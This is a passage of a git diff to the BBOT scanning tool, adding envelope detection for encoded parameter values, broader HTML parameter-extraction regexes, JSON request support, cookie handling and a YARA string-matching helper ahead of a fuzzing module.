diff --git a/README.md b/README.md index a9782bb62b..34c742fa58 100644 --- a/README.md +++ b/README.md @@ -383,6 +383,7 @@ For details, see [Configuration](https://www.blacklanternsecurity.com/bbot/Stabl - [List of Modules](https://www.blacklanternsecurity.com/bbot/Stable/modules/list_of_modules) - [Nuclei](https://www.blacklanternsecurity.com/bbot/Stable/modules/nuclei) - [Custom YARA Rules](https://www.blacklanternsecurity.com/bbot/Stable/modules/custom_yara_rules) + - [Lightfuzz](https://www.blacklanternsecurity.com/bbot/Stable/modules/lightfuzz) - **Misc** - [Contribution](https://www.blacklanternsecurity.com/bbot/Stable/contribution) - [Release History](https://www.blacklanternsecurity.com/bbot/Stable/release_history) diff --git a/bbot/core/event/base.py b/bbot/core/event/base.py index 2c4718844c..aa7715e71c 100644 --- a/bbot/core/event/base.py +++ b/bbot/core/event/base.py @@ -9,9 +9,9 @@ import ipaddress import traceback -from copy import copy from pathlib import Path from typing import Optional +from copy import copy, deepcopy from contextlib import suppress from radixtarget import RadixTarget from pydantic import BaseModel, field_validator @@ -40,6 +40,7 @@ validators, get_file_extension, ) +from bbot.core.helpers.web.envelopes import BaseEnvelope log = logging.getLogger("bbot.core.event") @@ -592,6 +593,10 @@ def parent(self, parent): elif not self._dummy: log.warning(f"Tried to set invalid parent on {self}: (got: {repr(parent)} ({type(parent)}))") + @property + def children(self): + return [] + @property def parent_id(self): parent_id = getattr(self.get_parent(), "id", None) @@ -646,6 +651,13 @@ def get_parents(self, omit=False, include_self=False): e = parent return parents + def clone(self): + # Create a shallow copy of the event first + cloned_event = copy(self) + # Re-assign a new UUID + cloned_event._uuid = uuid.uuid4() + return cloned_event + def _host(self): return "" @@ -827,7 +839,13 @@ def json(self, mode="json", siem_friendly=False): j["discovery_path"] = self.discovery_path j["parent_chain"] = self.parent_chain + # parameter envelopes + parameter_envelopes = getattr(self, "envelopes", None) + if parameter_envelopes is not None: + j["envelopes"] = parameter_envelopes.to_dict() + # normalize non-primitive python objects + for k, v in list(j.items()): if k == "data": continue @@ -1327,12 +1345,56 @@ class URL_HINT(URL_UNVERIFIED): class WEB_PARAMETER(DictHostEvent): + @property + def children(self): + # if we have any subparams, raise a new WEB_PARAMETER for each one + children = [] + envelopes = getattr(self, "envelopes", None) + if envelopes is not None: + subparams = sorted(list(self.envelopes.get_subparams())) + + if envelopes.selected_subparam is None: + current_subparam = subparams[0] + envelopes.selected_subparam = current_subparam[0] + if len(subparams) > 1: + for subparam, _ in subparams[1:]: + clone = self.clone() + clone.envelopes = deepcopy(envelopes) + clone.envelopes.selected_subparam = subparam + clone.parent = self + children.append(clone) + return children + + def sanitize_data(self, data): + original_value = data.get("original_value", None) + if original_value is not None: + try: + envelopes = BaseEnvelope.detect(original_value) + setattr(self, "envelopes", envelopes) + except ValueError as e: + log.verbose(f"Error detecting envelopes for {self}: {e}") + return data + def _data_id(self): # dedupe by url:name:param_type url = self.data.get("url", "") name = self.data.get("name", "") param_type = self.data.get("type", "") - return f"{url}:{name}:{param_type}" + envelopes = getattr(self, "envelopes", "") + subparam = getattr(envelopes, "selected_subparam", "") + + return f"{url}:{name}:{param_type}:{subparam}" + + def _outgoing_dedup_hash(self, event): + return hash( + ( + str(event.host), + event.data["url"], + event.data.get("name", ""), + event.data.get("type", ""), + event.data.get("envelopes", ""), + ) + ) def _url(self): return self.data["url"] @@ -1768,7 +1830,6 @@ def make_event( data = net.network_address event_class = globals().get(event_type, DefaultEvent) - return event_class( data, event_type=event_type, @@ -1828,7 +1889,6 @@ def event_from_json(j, siem_friendly=False): resolved_hosts = j.get("resolved_hosts", []) event._resolved_hosts = set(resolved_hosts) - event.timestamp = datetime.datetime.fromisoformat(j["timestamp"]) event.scope_distance = j["scope_distance"] parent_id = j.get("parent", None) diff --git a/bbot/core/helpers/diff.py b/bbot/core/helpers/diff.py index 1ea5de0e02..64c1b1e6a5 100644 --- a/bbot/core/helpers/diff.py +++ b/bbot/core/helpers/diff.py @@ -15,22 +15,24 @@ def __init__( parent_helper, method="GET", data=None, + json=None, allow_redirects=False, include_cache_buster=True, headers=None, cookies=None, - timeout=15, + timeout=10, ): self.parent_helper = parent_helper self.baseline_url = baseline_url self.include_cache_buster = include_cache_buster self.method = method self.data = data + self.json = json self.allow_redirects = allow_redirects self._baselined = False self.headers = headers self.cookies = cookies - self.timeout = 15 + self.timeout = 10 @staticmethod def merge_dictionaries(headers1, headers2): @@ -53,12 +55,13 @@ async def _baseline(self): follow_redirects=self.allow_redirects, method=self.method, data=self.data, + json=self.json, headers=self.headers, cookies=self.cookies, retries=2, timeout=self.timeout, ) - await self.parent_helper.sleep(1) + await self.parent_helper.sleep(0.5) # put random parameters in URL, headers, and cookies get_params = {self.parent_helper.rand_string(6): self.parent_helper.rand_string(6)} @@ -76,12 +79,12 @@ async def _baseline(self): follow_redirects=self.allow_redirects, method=self.method, data=self.data, + json=self.json, retries=2, timeout=self.timeout, ) self.baseline = baseline_1 - if baseline_1 is None or baseline_2 is None: log.debug("HTTP error while establishing baseline, aborting") raise HttpCompareError( @@ -90,6 +93,7 @@ async def _baseline(self): if baseline_1.status_code != baseline_2.status_code: log.debug("Status code not stable during baseline, aborting") raise HttpCompareError("Can't get baseline from source URL") + try: baseline_1_json = xmltodict.parse(baseline_1.text) baseline_2_json = xmltodict.parse(baseline_2.text) @@ -105,11 +109,9 @@ async def _baseline(self): for k in ddiff.keys(): for x in list(ddiff[k]): - log.debug(f"Added {k} filter for path: {x.path()}") self.ddiff_filters.append(x.path()) self.baseline_json = baseline_1_json - self.baseline_ignore_headers = [ h.lower() for h in [ @@ -167,7 +169,6 @@ def compare_body(self, content_1, content_2): if len(ddiff.keys()) == 0: return True else: - log.debug(ddiff) return False async def compare( @@ -178,6 +179,7 @@ async def compare( check_reflection=False, method="GET", data=None, + json=None, allow_redirects=False, timeout=None, ): @@ -208,6 +210,7 @@ async def compare( follow_redirects=allow_redirects, method=method, data=data, + json=json, timeout=timeout, ) diff --git a/bbot/core/helpers/helper.py b/bbot/core/helpers/helper.py index 78ccf67155..e863723801 100644 --- a/bbot/core/helpers/helper.py +++ b/bbot/core/helpers/helper.py @@ -12,6 +12,7 @@ from .regex import RegexHelper from .wordcloud import WordCloud from .interactsh import Interactsh +from .yara_helper import YaraHelper from .depsinstaller import DepsInstaller from .async_helpers import get_event_loop @@ -85,6 +86,7 @@ def __init__(self, preset): self._cloud = None self.re = RegexHelper(self) + self.yara = YaraHelper(self) self._dns = None self._web = None self.config_aware_validators = self.validators.Validators(self) @@ -129,7 +131,8 @@ def http_compare( cookies=None, method="GET", data=None, - timeout=15, + json=None, + timeout=10, ): return HttpCompare( url, @@ -141,6 +144,7 @@ def http_compare( timeout=timeout, method=method, data=data, + json=json, ) def temp_filename(self, extension=None): diff --git a/bbot/core/helpers/misc.py b/bbot/core/helpers/misc.py index 92c9e523fd..6eda16e4da 100644 --- a/bbot/core/helpers/misc.py +++ b/bbot/core/helpers/misc.py @@ -2,6 +2,7 @@ import sys import copy import json +import math import random import string import asyncio @@ -9,6 +10,7 @@ import ipaddress import regex as re import subprocess as sp + from pathlib import Path from contextlib import suppress from unidecode import unidecode # noqa F401 @@ -797,17 +799,14 @@ def recursive_decode(data, max_depth=5): return data -rand_pool = string.ascii_lowercase -rand_pool_digits = rand_pool + string.digits - - -def rand_string(length=10, digits=True): +def rand_string(length=10, digits=True, numeric_only=False): """ Generates a random string of specified length. Args: length (int, optional): The length of the random string. Defaults to 10. digits (bool, optional): Whether to include digits in the string. Defaults to True. + numeric_only (bool, optional): Whether to generate a numeric-only string. Defaults to False. Returns: str: A random string of the specified length. @@ -819,11 +818,17 @@ def rand_string(length=10, digits=True): 'ap4rsdtg5iw7ey7y3oa5' >>> rand_string(30, digits=False) 'xdmyxtglqfzqktngkesyulwbfrihva' + >>> rand_string(15, numeric_only=True) + '934857349857395' """ - pool = rand_pool - if digits: - pool = rand_pool_digits - return "".join([random.choice(pool) for _ in range(int(length))]) + if numeric_only: + pool = string.digits + elif digits: + pool = string.ascii_lowercase + string.digits + else: + pool = string.ascii_lowercase + + return "".join(random.choice(pool) for _ in range(length)) def truncate_string(s, n): @@ -885,7 +890,7 @@ def extract_params_xml(xml_data, compare_mode="getparam"): xml_data (str): XML-formatted string containing elements. Returns: - set: A set of tuples containing the tags and their corresponding text values present in the XML object. + set: A set of tuples containing the tags and their corresponding sanitized text values present in the XML object. Raises: Returns an empty set if ParseError occurs. @@ -907,7 +912,10 @@ def extract_params_xml(xml_data, compare_mode="getparam"): while stack: current_element = stack.pop() if validate_parameter(current_element.tag, compare_mode): - tag_value_pairs.add((current_element.tag, current_element.text)) + # Sanitize the text value + text_value = current_element.text.strip() if current_element.text else None + sanitized_value = quote(text_value, safe="") if text_value else None + tag_value_pairs.add((current_element.tag, sanitized_value)) for child in current_element: stack.append(child) return tag_value_pairs @@ -921,6 +929,7 @@ def extract_params_xml(xml_data, compare_mode="getparam"): "getparam": {chr(c) for c in range(33, 127) if chr(c) not in ":/?#[]@!$&'()*+,;="}, "postparam": {chr(c) for c in range(33, 127) if chr(c) not in ":/?#[]@!$&'()*+,;="}, "cookie": {chr(c) for c in range(33, 127) if chr(c) not in '()<>@,;:"/[]?={} \t'}, + "bodyjson": set(chr(c) for c in range(33, 127) if chr(c) not in ":/?#[]@!$&'()*+,;="), } @@ -1874,6 +1883,7 @@ def make_table(rows, header, **kwargs): | row2 | row2 | +-----------+-----------+ """ + from tabulate import tabulate # fix IndexError: list index out of range @@ -2772,6 +2782,21 @@ def clean_dict(d, *key_names, fuzzy=False, exclude_keys=None, _prev_key=None): return d +def calculate_entropy(data): + """Calculate the Shannon entropy of a byte sequence""" + if not data: + return 0 + frequency = {} + for byte in data: + if byte in frequency: + frequency[byte] += 1 + else: + frequency[byte] = 1 + data_len = len(data) + entropy = -sum((count / data_len) * math.log2(count / data_len) for count in frequency.values()) + return entropy + + top_ports_cache = None @@ -2825,3 +2850,15 @@ def clean_requirement(req_string): dist = distribution("bbot") return [clean_requirement(r) for r in dist.requires] + + +def is_printable(s): + """ + Check if a string is printable + """ + if not isinstance(s, str): + raise ValueError(f"Expected a string, got {type(s)}") + + # Exclude control characters that break display/printing + s = set(s) + return all(ord(c) >= 32 or c in "\t\n\r" for c in s) diff --git a/bbot/core/helpers/regexes.py b/bbot/core/helpers/regexes.py index 6a0a27456e..122ff79af2 100644 --- a/bbot/core/helpers/regexes.py +++ b/bbot/core/helpers/regexes.py @@ -114,27 +114,64 @@ # For use with excavate parameters extractor input_tag_regex = re.compile( - r"]+?name=[\"\']?([\.$\w]+)[\"\']?(?:[^>]*?value=[\"\']([=+\/\w]*)[\"\'])?[^>]*>" + r"]*?\sname=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?\svalue=[\"\']?([:%\-\._=+\/\w\s]*)[\"\']?[^>]*?>" ) -jquery_get_regex = re.compile(r"url:\s?[\"\'].+?\?(\w+)=") -jquery_post_regex = re.compile(r"\$.post\([\'\"].+[\'\"].+\{(.+)\}") +input_tag_regex2 = re.compile( + r"]*?\svalue=[\"\']?([:\-%\._=+\/\w\s]*)[\"\']?[^>]*?\sname=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?>" +) +input_tag_novalue_regex = re.compile(r"]*\b\svalue=)[^>]*?\sname=[\"\']?([\-\._=+\/\w]*)[\"\']?[^>]*?>") +# jquery_get_regex = re.compile(r"url:\s?[\"\'].+?\?(\w+)=") +# jquery_get_regex = re.compile(r"\$.get\([\'\"].+[\'\"].+\{(.+)\}") +# jquery_post_regex = re.compile(r"\$.post\([\'\"].+[\'\"].+\{(.+)\}") a_tag_regex = re.compile(r"]*href=[\"\']([^\"\'?>]*)\?([^&\"\'=]+)=([^&\"\'=]+)") img_tag_regex = re.compile(r"]*src=[\"\']([^\"\'?>]*)\?([^&\"\'=]+)=([^&\"\'=]+)") get_form_regex = re.compile( - r"]+(?:action=[\"']?([^\s\'\"]+)[\"\']?)?[^>]*method=[\"']?[gG][eE][tT][\"']?[^>]*>([\s\S]*?)<\/form>", + r"]*\bmethod=[\"']?[gG][eE][tT][\"']?[^>]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*>([\s\S]*?)<\/form>", + re.DOTALL, +) +get_form_regex2 = re.compile( + r"]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*\bmethod=[\"']?[gG][eE][tT][\"']?[^>]*>([\s\S]*?)<\/form>", re.DOTALL, ) post_form_regex = re.compile( - r"]+(?:action=[\"']?([^\s\'\"]+)[\"\']?)?[^>]*method=[\"']?[pP][oO][sS][tT][\"']?[^>]*>([\s\S]*?)<\/form>", + r"]*\bmethod=[\"']?[pP][oO][sS][tT][\"']?[^>]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*>([\s\S]*?)<\/form>", + re.DOTALL, +) +post_form_regex2 = re.compile( + r"]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*\bmethod=[\"']?[pP][oO][sS][tT][\"']?[^>]*>([\s\S]*?)<\/form>", + re.DOTALL, +) +post_form_regex_noaction = re.compile( + r"]*(?:\baction=[\"']?([^\s\"'<>]+)[\"']?)?[^>]*\bmethod=[\"']?[pP][oO][sS][tT][\"']?[^>]*>([\s\S]*?)<\/form>", re.DOTALL, ) +generic_form_regex = re.compile( + r"]*\bmethod=)[^>]+(?:\baction=[\"']?([^\s\"'<>]+)[\"']?)[^>]*>([\s\S]*?)<\/form>", + re.IGNORECASE | re.DOTALL, +) + select_tag_regex = re.compile( - r"]+?name=[\"\']?(\w+)[\"\']?[^>]*>(?:\s*]*?value=[\"\'](\w*)[\"\']?[^>]*>)?" + r"]+?name=[\"\']?([_\-\.\w]+)[\"\']?[^>]*>(?:\s*]*?value=[\"\']?([_\.\-\w]*)[\"\']?[^>]*>)?", + re.IGNORECASE | re.DOTALL, ) + textarea_tag_regex = re.compile( - r']*\bname=["\']?(\w+)["\']?[^>]*>(.*?)', re.IGNORECASE | re.DOTALL + r"]*?\sname=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?\svalue=[\"\']?([:%\-\._=+\/\w]*)[\"\']?[^>]*?>" +) +textarea_tag_regex2 = re.compile( + r"]*?\svalue=[\"\']?([:\-%\._=+\/\w]*)[\"\']?[^>]*?\sname=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?>" +) +textarea_tag_novalue_regex = re.compile( + r']*\bname=["\']?([_\-\.\w]+)["\']?[^>]*>(.*?)', re.IGNORECASE | re.DOTALL +) + +button_tag_regex = re.compile( + r"]*?name=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?value=[\"\']?([%\-\._=+\/\w]*)[\"\']?[^>]*?>" +) +button_tag_regex2 = re.compile( + r"]*?value=[\"\']?([\-%\._=+\/\w]*)[\"\']?[^>]*?name=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?>" ) -tag_attribute_regex = re.compile(r"<[^>]*(?:href|action|src)\s*=\s*[\"\']?(?!mailto:)([^\s\'\"\>]+)[\"\']?[^>]*>") +tag_attribute_regex = re.compile(r"<[^>]*(?:href|action|src)\s*=\s*[\"\']?(?!mailto:)([^\'\"\>]+)[\"\']?[^>]*>") valid_netloc = r"[^\s!@#$%^&()=/?\\'\";~`<>]+" diff --git a/bbot/core/helpers/url.py b/bbot/core/helpers/url.py index 5482e54c51..91c7d8a01b 100644 --- a/bbot/core/helpers/url.py +++ b/bbot/core/helpers/url.py @@ -32,7 +32,10 @@ def parse_url(url): return urlparse(url) -def add_get_params(url, params): +def add_get_params(url, params, encode=True): + def _no_encode_quote(s, safe="/", encoding=None, errors=None): + return s + """ Add or update query parameters to the given URL. @@ -53,10 +56,23 @@ def add_get_params(url, params): >>> add_get_params('https://www.evilcorp.com?foo=1', {'foo': 2}) ParseResult(scheme='https', netloc='www.evilcorp.com', path='', params='', query='foo=2', fragment='') """ - parsed = parse_url(url) - old_params = dict(parse_qs(parsed.query)) - old_params.update(params) - return parsed._replace(query=urlencode(old_params, doseq=True)) + parsed = urlparse(url) + query_params = parsed.query.split("&") + + existing_params = {} + for param in query_params: + if "=" in param: + k, v = param.split("=", 1) + existing_params[k] = v + + existing_params.update(params) + + if encode: + new_query = urlencode(existing_params, doseq=True) + else: + new_query = urlencode(existing_params, doseq=True, quote_via=_no_encode_quote) + + return parsed._replace(query=new_query) def get_get_params(url): diff --git a/bbot/core/helpers/web/client.py b/bbot/core/helpers/web/client.py index 737a2f9dcb..1ab6b342db 100644 --- a/bbot/core/helpers/web/client.py +++ b/bbot/core/helpers/web/client.py @@ -52,7 +52,7 @@ def __init__(self, *args, **kwargs): if http_debug: log.trace(f"Creating AsyncClient: {args}, {kwargs}") - self._persist_cookies = kwargs.pop("persist_cookies", True) + self._persist_cookies = kwargs.pop("persist_cookies", False) # timeout http_timeout = self._web_config.get("http_timeout", 20) @@ -63,11 +63,18 @@ def __init__(self, *args, **kwargs): headers = kwargs.get("headers", None) if headers is None: headers = {} + + # cookies + cookies = kwargs.get("cookies", None) + if cookies is None: + cookies = {} + # user agent user_agent = self._web_config.get("user_agent", "BBOT") if "User-Agent" not in headers: headers["User-Agent"] = user_agent kwargs["headers"] = headers + kwargs["cookies"] = cookies # proxy proxies = self._web_config.get("http_proxy", None) kwargs["proxies"] = proxies @@ -78,10 +85,23 @@ def __init__(self, *args, **kwargs): self._cookies = DummyCookies() def build_request(self, *args, **kwargs): - request = super().build_request(*args, **kwargs) - # add custom headers if the URL is in-scope - # TODO: re-enable this - if self._target.in_scope(str(request.url)): + if args: + url = args[0] + kwargs["url"] = url + url = kwargs["url"] + + target_in_scope = self._target.in_scope(str(url)) + + if target_in_scope: + if not kwargs.get("cookies", None): + kwargs["cookies"] = {} + for ck, cv in self._web_config.get("http_cookies", {}).items(): + if ck not in kwargs["cookies"]: + kwargs["cookies"][ck] = cv + + request = super().build_request(**kwargs) + + if target_in_scope: for hk, hv in self._web_config.get("http_headers", {}).items(): hv = str(hv) # don't clobber headers diff --git a/bbot/core/helpers/web/engine.py b/bbot/core/helpers/web/engine.py index de69e18766..9e1c173bc9 100644 --- a/bbot/core/helpers/web/engine.py +++ b/bbot/core/helpers/web/engine.py @@ -8,7 +8,7 @@ from contextlib import asynccontextmanager from bbot.core.engine import EngineServer -from bbot.core.helpers.misc import bytes_to_human, human_to_bytes, get_exception_chain +from bbot.core.helpers.misc import bytes_to_human, human_to_bytes, get_exception_chain, truncate_string log = logging.getLogger("bbot.core.helpers.web.engine") @@ -203,6 +203,14 @@ async def _acatch(self, url, raise_error): else: log.trace(f"Error with request to URL: {url}: {e}") log.trace(traceback.format_exc()) + except httpx.InvalidURL as e: + if raise_error: + raise + else: + log.warning( + f"Invalid URL (possibly due to dangerous redirect) on request to : {url}: {truncate_string(e, 200)}" + ) + log.trace(traceback.format_exc()) except ssl.SSLError as e: msg = f"SSL error with request to URL: {url}: {e}" if raise_error: diff --git a/bbot/core/helpers/web/envelopes.py b/bbot/core/helpers/web/envelopes.py new file mode 100644 index 0000000000..3858273fe0 --- /dev/null +++ b/bbot/core/helpers/web/envelopes.py @@ -0,0 +1,352 @@ +import json +import base64 +import binascii +import xmltodict +from contextlib import suppress +from urllib.parse import unquote, quote +from xml.parsers.expat import ExpatError + +from bbot.core.helpers.misc import is_printable + + +# TODO: This logic is perfect for extracting params. We should expand it outwards to include other higher-level envelopes: +# - QueryStringEnvelope +# - MultipartFormEnvelope +# - HeaderEnvelope +# - CookieEnvelope +# +# Once we start ingesting HTTP_REQUEST events, this will make them instantly fuzzable + + +class EnvelopeChildTracker(type): + """ + Keeps track of all the child envelope classes + """ + + children = [] + + def __new__(mcs, name, bases, class_dict): + # Create the class + cls = super().__new__(mcs, name, bases, class_dict) + # Don't register the base class itself + if bases and not name.startswith("Base"): # Only register if it has base classes (i.e., is a child) + EnvelopeChildTracker.children.append(cls) + EnvelopeChildTracker.children.sort(key=lambda x: x.priority) + return cls + + +class BaseEnvelope(metaclass=EnvelopeChildTracker): + __slots__ = ["subparams", "selected_subparam", "singleton"] + + # determines the order of the envelope detection + priority = 5 + # whether the envelope is the final format, e.g. raw text/binary + end_format = False + ignore_exceptions = (Exception,) + envelope_classes = EnvelopeChildTracker.children + # transparent envelopes (i.e. TextEnvelope) are not counted as envelopes or included in the finding descriptions + transparent = False + + def __init__(self, s): + unpacked_data = self.unpack(s) + + if self.end_format: + inner_envelope = unpacked_data + else: + inner_envelope = self.detect(unpacked_data) + + self.selected_subparam = None + # if we have subparams, our inner envelope will be a dictionary + if isinstance(inner_envelope, dict): + self.subparams = inner_envelope + self.singleton = False + # otherwise if we just have one value, we make a dictionary with a default key + else: + self.subparams = {"__default__": inner_envelope} + self.singleton = True + + @property + def final_envelope(self): + try: + return self.unpacked_data(recursive=False).final_envelope + except AttributeError: + return self + + @property + def friendly_name(self): + if self.friendly_name: + return self.friendly_name + else: + return self.name + + def pack(self, data=None): + if data is None: + data = self.unpacked_data(recursive=False) + with suppress(AttributeError): + data = data.pack() + return self._pack(data) + + def unpack(self, s): + return self._unpack(s) + + def _pack(self, s): + """ + Encodes the string using the class's unique encoder (adds the outer envelope) + """ + raise NotImplementedError("Envelope.pack() must be implemented") + + def _unpack(self, s): + """ + Decodes the string using the class's unique encoder (removes the outer envelope) + """ + raise NotImplementedError("Envelope.unpack() must be implemented") + + def unpacked_data(self, recursive=True): + try: + unpacked = self.subparams["__default__"] + if recursive: + with suppress(AttributeError): + return unpacked.unpacked_data(recursive=recursive) + return unpacked + except KeyError: + return self.subparams + + @classmethod + def detect(cls, s): + """ + Detects the type of envelope used to encode the packed_data + """ + if not isinstance(s, str): + raise ValueError(f"Invalid data passed to detect(): {s} ({type(s)})") + # if the value is empty, we just return the text envelope + if not s.strip(): + return TextEnvelope(s) + for envelope_class in cls.envelope_classes: + with suppress(*envelope_class.ignore_exceptions): + envelope = envelope_class(s) + if envelope is not False: + # make sure the envelope is not just the original string, to prevent unnecessary envelope detection. For example, "10" is technically valid JSON, but nothing is being encapsulated + if str(envelope.unpacked_data()) == s: + return TextEnvelope(s) + else: + return envelope + del envelope + raise Exception(f"No envelope detected for data: '{s}' ({type(s)})") + + def get_subparams(self, key=None, data=None, recursive=True): + if data is None: + data = self.unpacked_data(recursive=recursive) + if key is None: + key = [] + + if isinstance(data, dict): + for k, v in data.items(): + full_key = key + [k] + if isinstance(v, dict): + yield from self.get_subparams(full_key, v) + else: + yield full_key, v + else: + yield [], data + + def get_subparam(self, key=None, recursive=True): + if key is None: + key = self.selected_subparam + envelope = self + if recursive: + envelope = self.final_envelope + data = envelope.unpacked_data(recursive=False) + if key is None: + if envelope.singleton: + key = [] + else: + raise ValueError("No subparam selected") + else: + for segment in key: + data = data[segment] + return data + + def set_subparam(self, key=None, value=None, recursive=True): + envelope = self + if recursive: + envelope = self.final_envelope + + # if there's only one value to set, we can just set it directly + if envelope.singleton: + envelope.subparams["__default__"] = value + return + + # if key isn't specified, use the selected subparam + if key is None: + key = self.selected_subparam + if key is None: + raise ValueError(f"{self} -> {envelope}: No subparam selected") + + data = envelope.unpacked_data(recursive=False) + for segment in key[:-1]: + data = data[segment] + data[key[-1]] = value + + @property + def name(self): + return self.__class__.__name__ + + @property + def num_envelopes(self): + num_envelopes = 0 if self.transparent else 1 + if self.end_format: + return num_envelopes + for envelope in self.subparams.values(): + with suppress(AttributeError): + num_envelopes += envelope.num_envelopes + return num_envelopes + + @property + def summary(self): + if self.transparent: + return "" + self_string = f"{self.friendly_name}" + with suppress(AttributeError): + child_envelope = self.unpacked_data(recursive=False) + child_summary = child_envelope.summary + if child_summary: + self_string += f" -> {child_summary}" + + if self.selected_subparam: + self_string += f" [{'.'.join(self.selected_subparam)}]" + return self_string + + def to_dict(self): + return self.summary + + def __str__(self): + return self.summary + + __repr__ = __str__ + + +class HexEnvelope(BaseEnvelope): + """ + Hexadecimal encoding + """ + + friendly_name = "Hexadecimal-Encoded" + + ignore_exceptions = (ValueError, UnicodeDecodeError) + + def _pack(self, s): + return s.encode().hex() + + def _unpack(self, s): + return bytes.fromhex(s).decode() + + +class B64Envelope(BaseEnvelope): + """ + Base64 encoding + """ + + friendly_name = "Base64-Encoded" + + ignore_exceptions = (binascii.Error, UnicodeDecodeError, ValueError) + + def unpack(self, s): + # it's easy to have a small value that accidentally decodes to base64 + if len(s) < 8 and not s.endswith("="): + raise ValueError("Data is too small to be sure") + return super().unpack(s) + + def _pack(self, s): + return base64.b64encode(s.encode()).decode() + + def _unpack(self, s): + return base64.b64decode(s).decode() + + +class URLEnvelope(BaseEnvelope): + """ + URL encoding + """ + + friendly_name = "URL-Encoded" + + def unpack(self, s): + unpacked = super().unpack(s) + if unpacked == s: + raise Exception("Data is not URL-encoded") + return unpacked + + def _pack(self, s): + return quote(s) + + def _unpack(self, s): + return unquote(s) + + +class TextEnvelope(BaseEnvelope): + """ + Text encoding + """ + + end_format = True + # lowest priority means text is the ultimate fallback + priority = 10 + transparent = True + ignore_exceptions = () + + def _pack(self, s): + return s + + def _unpack(self, s): + if not is_printable(s): + raise ValueError(f"Non-printable data detected in TextEnvelope: '{s}' ({type(s)})") + return s + + +# class BinaryEnvelope(BaseEnvelope): +# """ +# Binary encoding +# """ +# end_format = True + +# def pack(self, s): +# return s + +# def unpack(self, s): +# if is_printable(s): +# raise Exception("Non-binary data detected in BinaryEnvelope") +# return s + + +class JSONEnvelope(BaseEnvelope): + """ + JSON encoding + """ + + friendly_name = "JSON-formatted" + end_format = True + priority = 8 + ignore_exceptions = (json.JSONDecodeError,) + + def _pack(self, s): + return json.dumps(s) + + def _unpack(self, s): + return json.loads(s) + + +class XMLEnvelope(BaseEnvelope): + """ + XML encoding + """ + + friendly_name = "XML-formatted" + end_format = True + priority = 9 + ignore_exceptions = (ExpatError,) + + def _pack(self, s): + return xmltodict.unparse(s) + + def _unpack(self, s): + return xmltodict.parse(s) diff --git a/bbot/core/helpers/web/web.py b/bbot/core/helpers/web/web.py index 23f7a8c607..41da460dbc 100644 --- a/bbot/core/helpers/web/web.py +++ b/bbot/core/helpers/web/web.py @@ -349,6 +349,7 @@ async def curl(self, *args, **kwargs): curl_command.append("-k") headers = kwargs.get("headers", {}) + cookies = kwargs.get("cookies", {}) ignore_bbot_global_settings = kwargs.get("ignore_bbot_global_settings", False) @@ -362,10 +363,17 @@ async def curl(self, *args, **kwargs): if "User-Agent" not in headers: headers["User-Agent"] = user_agent - # only add custom headers if the URL is in-scope + # only add custom headers / cookies if the URL is in-scope if self.parent_helper.preset.in_scope(url): for hk, hv in self.web_config.get("http_headers", {}).items(): - headers[hk] = hv + # Only add the header if it doesn't already exist in the headers dictionary + if hk not in headers: + headers[hk] = hv + + for ck, cv in self.web_config.get("http_cookies", {}).items(): + # don't clobber cookies + if ck not in cookies: + cookies[ck] = cv # add the timeout if "timeout" not in kwargs: diff --git a/bbot/core/helpers/yara_helper.py b/bbot/core/helpers/yara_helper.py new file mode 100644 index 0000000000..bc9e914cd3 --- /dev/null +++ b/bbot/core/helpers/yara_helper.py @@ -0,0 +1,51 @@ +import yara + + +class YaraHelper: + def __init__(self, parent_helper): + self.parent_helper = parent_helper + + def compile_strings(self, strings: list[str], nocase=False): + """ + Compile a list of strings into a YARA rule + """ + # Format each string as a YARA string definition + yara_strings = [] + for i, s in enumerate(strings): + s = s.replace('"', '\\"') + yara_string = f'$s{i} = "{s}"' + if nocase: + yara_string += " nocase" + yara_strings.append(yara_string) + yara_strings = "\n ".join(yara_strings) + + # Create the complete YARA rule + yara_rule = f""" +rule strings_match +{{ + strings: + {yara_strings} + condition: + any of them +}} +""" + print(yara_rule) + # Compile and return the rule + return self.compile(source=yara_rule) + + def compile(self, *args, **kwargs): + return yara.compile(*args, **kwargs) + + async def match(self, compiled_rules, text): + """ + Given a compiled YARA rule and a body of text, return a list of strings that match the rule + """ + matched_strings = [] + matches = await self.parent_helper.run_in_executor(compiled_rules.match, data=text) + if matches: + for match in matches: + for string_match in match.strings: + for instance in string_match.instances: + matched_string = instance.matched_data.decode("utf-8") + matched_strings.append(matched_string) + return matched_strings diff --git a/bbot/core/modules.py b/bbot/core/modules.py index c83d34a96f..4223327a5b 100644 --- a/bbot/core/modules.py +++ b/bbot/core/modules.py @@ -104,8 +104,9 @@ def add_module_dir(self, module_dir): def file_filter(self, file): file = file.resolve() - if "templates" in file.parts: - return False + for part in file.parts: + if part.endswith("_submodules") or part == "templates": + return False return file.suffix.lower() == ".py" and file.stem not in ["base", "__init__"] def preload(self, module_dirs=None): @@ -158,12 +159,11 @@ def preload(self, module_dirs=None): namespace = f"bbot.modules.{module_dir.name}" try: preloaded = self.preload_module(module_file) + if preloaded is None: + continue module_type = "scan" if module_dir.name in ("output", "internal"): module_type = str(module_dir.name) - elif module_dir.name not in ("modules"): - flags = set(preloaded["flags"] + [module_dir.name]) - preloaded["flags"] = sorted(flags) # derive module dependencies from watched event types (only for scan modules) if module_type == "scan": @@ -327,12 +327,28 @@ def preload_module(self, module_file): deps_apt = [] deps_common = [] ansible_tasks = [] + config = {} + options_desc = {} python_code = open(module_file).read() # take a hash of the code so we can keep track of when it changes module_hash = sha1(python_code).hexdigest() parsed_code = ast.parse(python_code) - config = {} - options_desc = {} + + # discard if the module isn't a valid BBOT module + is_bbot_module = False + for root_element in parsed_code.body: + if type(root_element) == ast.ClassDef: + for class_attr in root_element.body: + if type(class_attr) == ast.Assign and any( + target.id in ("watched_events", "produced_events") for target in class_attr.targets + ): + is_bbot_module = True + break + + if not is_bbot_module: + log.debug(f"Skipping {module_file} as it is not a valid BBOT module") + return + for root_element in parsed_code.body: # look for classes if type(root_element) == ast.ClassDef: diff --git a/bbot/modules/base.py b/bbot/modules/base.py index 8d125c91c9..486f2de41e 100644 --- 